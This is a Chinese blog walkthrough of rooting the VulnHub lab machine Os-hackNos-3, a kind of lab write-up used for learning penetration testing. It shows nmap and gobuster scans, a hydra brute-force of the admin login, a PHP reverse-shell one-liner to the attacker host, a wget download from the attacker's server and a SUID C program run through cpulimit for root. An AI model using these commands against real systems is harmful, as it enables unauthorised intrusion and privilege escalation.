vulnhub靶机 Os-hackNos-3

于 2023-06-20 19:21:53 发布
阅读量155 收藏
点赞数
分类专栏: Vulfocus打靶 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52178795/article/details/131309569
版权

下载靶机

地址:hackNos: Os-hackNos-3 ~ VulnHub

 

问题阐述

使用virtualbox,kali和靶机均使用桥接网络

kali:172.20.10.10 靶机:172.20.10.5

打靶目标

获取root权限

打靶过程

信息搜集

nmap扫描存活主机,并对存活主机做端口扫描

nmap -sP 172.20.10.1/24

nmap -sV -sC -p- 172.20.10.5

 目录扫描

gobuster dir -u http://172.20.10.5 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

 访问网站,发现是一个博客,直接尝试访问后台

爬取网站信息制作字典

cewl http://172.20.10.5/websec/ >cewl.txt

 hydra 穷举后台

hydra -l contact@hacknos.com -P cewl.txt 172.20.10.5 http-post-form "/websec/admin:username=^USER^&password=^PASS^:Wrong email"

 登录后台,上传shell,清除.hatccess

使用蚁剑连接。在这里找到第一个flag

 网上有好多反弹shell的方法,nc反弹shell,我没成功,最后在目录上创建了一个a.php文件,写入以下内容,执行文件,反弹成功

<?php $sock=fsockopen("172.20.10.10",1234);exec("/bin/sh -i <&3 >&3 2>&3");?>

//php反弹shell

 转为交互式shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

权限提升

查找 suid 文件 
find /usr/bin -type f -perm -u=s 2>/dev/null

 cpulimit 提权

本地编写提权exp,上传到靶机,执行即可提升到root权限

//新建 suid.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main(int argc,char *argv[])
{
    setreuid(0,0);
    execve("/bin/bash",NULL,NULL);
}

//编译改名为exp

gcc suid.c -o exp

//kali开启http服务

python3 -m http.server 8001

//靶机下载文件

wget http://172.20.10.10:8001/exp


//赋予执行权限靶机执行文件

chmod +x exp

cpulimit -l 100 -f ./exp

www-data@hacknos:/tmp$ cpulimit -l 100 -f ./exp
cpulimit -l 100 -f ./exp
Process 2800 detected
root@hacknos:/tmp# id 
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@hacknos:/tmp# whoami
whoami
root
凉城木槿
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
靶机渗透练习89-IA:Nemesis (1.0.1)
hirak0的博客
05-01 3365
靶机描述 靶机地址:https://www.vulnhub.com/entry/ia-nemesis-101,582/ Description Difficulty: Intermediate to Hard Goal: Get the root shell and read all the 3 flags. Information: You need some good encryption and programming skills to root this box. Please solve t
Cloud AV靶机渗透过程
捣蛋鬼
03-26 2531
背景:云防病毒扫描服务,测试阶段 目标:渗透该服务,找到漏洞并提权 难易程度:简单(思路和技巧) 攻击方法:端口扫描 web侦察 SQL注入 命令注入 密码爆破 代码分析 NC串联 本地提权 0x01 主机发现:sudo arp-scan -l 倾向于黑客工具 arping 更多系统适用 使用for循环--for i in $(seq 1 254); do sudo arping -c 1 2.2.2.$i;done 0x02 使用nmap全端口扫描:sudo nmap -p-...
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程)
qq_51577576的博客
04-12 1833
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-5 通关详解 (附靶机搭建教程) 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
VulnHub实战篇二:Wakanda-1靶机渗透记录
a1004070060的博客
04-05 1030
0x01靶机信息 靶机名称:Wakanda-1 下载地址:https://download.vulnhub.com/wakanda/wakanda-1.ova 操作系统:debian 渗透目标:获取root权限,取得三个flag 0x02信息搜集 1.主机信息扫描 本地虚拟机搭建完环境后无法获悉靶机地址,需要使用主机探测工具扫描一下ip,这里使用nmap,命令如下。 nma...
Vulnhub-RickdiculouslyEasy靶机实战
御七彩虹猫
04-14 1028
Vulnhub-RickdiculouslyEasy靶机实战
vulnhub靶机实战-My-cmsms靶机
最新发布
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
靶机系列测试 Os-hackNos-11
08-03
1.收集信息 3.对Drupal 7.57进行安全检测 5.解密文件 7.特权提升
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 Five-3靶机
12-07
Vulnhub靶机渗透测试 Five-3靶机
渗透项目(七):DERPNSTINK: 1
Ays.Ie的博客
11-12 1469
本篇文章记录了作者第7个渗透项目,具体记录了渗透过程以及方法。
靶机练习】Vulnhub靶场Earth-练习记录
weixin_36591264的博客
02-17 2298
注:靶机开机前需要在虚拟机设置关闭USB,否则靶机无法打开 信息收集 攻击机IP:192.168.43.118 主机发现: sudo nmap -sP 192.168.43.1/24 确认目标机IP:192.168.43.241 端口扫描: sudo nmap -sC -sV -p- 192.168.43.241 扫描结果: 目标机开了22端口和80端口,80端口中配置了两个DNS,需要修改hosts文件指定IP。 没修改hosts之前访问http://192.168.43.241时返回Bad Req
vulnhub - digitalworld.local: MERCY v2 (考点:信息搜集 & smb & 端口敲门 & RIPS & tomcat & linux 提权)
冬萍子癸水
04-25 1181
https://www.vulnhub.com/entry/digitalworldlocal-mercy-v2,263/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了 nmap PORT STATE SERVICE REASON VERSION 22/tcp filtered ssh port-unreach...
vulnhub-DarkHole 1-靶场-打靶记录
lcc001114的博客
06-15 539
这里我们登录进去修改密码点change抓包,发现id=2,咱么大胆猜测一下管理员账户的 id=1, 那么我们尝试抓包越权修改管理员密码。发现第一个无限注册的漏洞(靶场没卵用),后端只校验用户名/邮箱/在数据库重没重复,并没有验证码进行注册限制。接下来用注册好的账号登录,在拦截登录第二个包发现个熟悉的身影adshboard.php并且携带id。更改环境变量,等执行./toto时会执行id,执行id时就会执行我们的/bin/bash。正常来讲应该是成功了,但这却失败了可能是蚁剑的原因,反弹到kali机上试试。
Vulnhub-CTF5靶机实战
御七彩虹猫
05-16 1607
Vulnhub-CTF5靶机实战
靶机渗透练习97-hacksudo:ProximaCentauri
hirak0的博客
05-10 2512
靶机描述 靶机地址:https://www.vulnhub.com/entry/hacksudo-proximacentauri,709/ Description Box created by hacksudo team members vishal Waghmare , Soham Deshmukh This box should be easy to medium . This machine was created for the InfoSec Prep Discord Server (http
【甄选靶场】Vulnhub百个项目渗透——项目三十六:PinkysPalace-v3(隧道搭建,内网穿透,登录爆破,格式化字符串缓冲区溢出漏洞,insmod提权)
人间体佐菲的博客
10-10 934
【甄选靶场】Vulnhub百个项目渗透——项目三十六:PinkysPalace-v3(隧道搭建,内网穿透,登录爆破,格式化字符串缓冲区溢出漏洞,insmod提权)
vulnhub靶场渗透系列-- AI:Web:2
lza20001103的博客
10-01 2577
vulnhub靶场渗透系列-- AI:Web:2
Vulnhub靶场之symfonos:1
SoporAeternus12的博客
04-16 3366
靶场的下载地址: 信息收集 nmap -sP 192.168.157.145/24 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-16 09:45 EDT Nmap scan report for 192.168.157.2 Host is up (0.00055s latency). Nmap scan report for 192.168.157.158 Host is up (0.00016s latency). Nmap scan repor
vulnhub靶机-jangow: 1.0.1
03-16
vulnhub靶机-jangow: 1..1是一款用于渗透测试和漏洞攻击的虚拟机。它基于Ubuntu操作系统,包含多个漏洞和弱点,供安全专业人员进行测试和实践。该靶机的目标是获取root权限,并且需要使用各种技术和工具来完成任务。对于想要提高渗透测试技能的安全从业者来说,这是一个非常有用的学习资源。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

凉城木槿

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值